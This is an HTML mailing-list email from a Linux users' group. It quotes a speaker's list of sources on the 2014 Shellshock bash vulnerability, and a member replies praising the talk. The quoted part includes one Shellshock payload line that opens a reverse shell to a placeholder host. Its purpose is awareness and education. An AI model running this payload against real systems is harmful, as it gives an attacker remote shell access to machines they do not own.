<html><head><meta http-equiv="Content-Type" content="text/html charset=us-ascii"></head><body style="word-wrap: break-word; -webkit-nbsp-mode: space; -webkit-line-break: after-white-space;">On 25 Sep 2014, at 23:15, Gordon Gray <<a href="mailto:gordo.gray@gmail.com">gordo.gray@gmail.com</a>> wrote:<br><div><div><br class="Apple-interchange-newline"><blockquote type="cite"><div dir="ltr">sources from my talk earlier:<br><br>cve<br><a href="http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-6271" target="_blank">http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-6271</a><br>better explanation<br><a href="http://seclists.org/oss-sec/2014/q3/650" target="_blank">http://seclists.org/oss-sec/2014/q3/650</a><br>easy to use poc<br><a href="https://pay.reddit.com/r/netsec/comments/2hbxtc/cve20146271_remote_code_execution_through_bash/" target="_blank">https://pay.reddit.com/r/netsec/comments/2hbxtc/cve20146271_remote_code_execution_through_bash/</a><div>pretty decent writeup<br><a href="http://www.troyhunt.com/2014/09/everything-you-need-to-know-about.html" target="_blank">http://www.troyhunt.com/2014/09/everything-you-need-to-know-about.html</a><br><div>ping scan</div><div><a href="http://blog.erratasec.com/2014/09/bash-shellshock-scan-of-internet.html" target="_blank">http://blog.erratasec.com/2014/09/bash-shellshock-scan-of-internet.html</a></div><div>local bash test<br><a href="http://security.stackexchange.com/questions/68168/is-there-a-short-command-to-test-if-my-server-is-secure-against-the-shellshock-b" target="_blank">http://security.stackexchange.com/questions/68168/is-there-a-short-command-to-test-if-my-server-is-secure-against-the-shellshock-b</a></div><div><br></div><div>and this is the live demo i would have done if my vps host wasn't being dos'd. don't run this on anything you don't (already) own<br>() { :; }; bash -i >& /dev/tcp/X.X.X.X/8080 0>&1<br><br>mail me to discuss public demos if you need to scare the shit out of your boss for a budget increase :)</div><div>but seriously, don't break the law. if you do it's not my fault. i'm not liable. don't sue me. ass covered.</div></div></div>
_______________________________________________<br>dundee GNU/Linux Users Group mailing list<br><a href="mailto:dundee@mailman.lug.org.uk">dundee@mailman.lug.org.uk</a> <a href="http://dundee.lug.org.uk">http://dundee.lug.org.uk</a><br><a href="https://mailman.lug.org.uk/mailman/listinfo/dundee">https://mailman.lug.org.uk/mailman/listinfo/dundee</a><br>Chat on IRC, #tlug on irc.lug.org.uk</blockquote></div><br></div><div>Well done on pulling that flash talk together last night Gordon, it was very good.<div><br></div><div>I am already reading articles in the press that are criticising Open Source software, in particular calling into question that bash appears to have a single maintainer and it follows on from the recent heart bleed vulnerability.</div></div><div><br></div><div>Paul</div></body></html>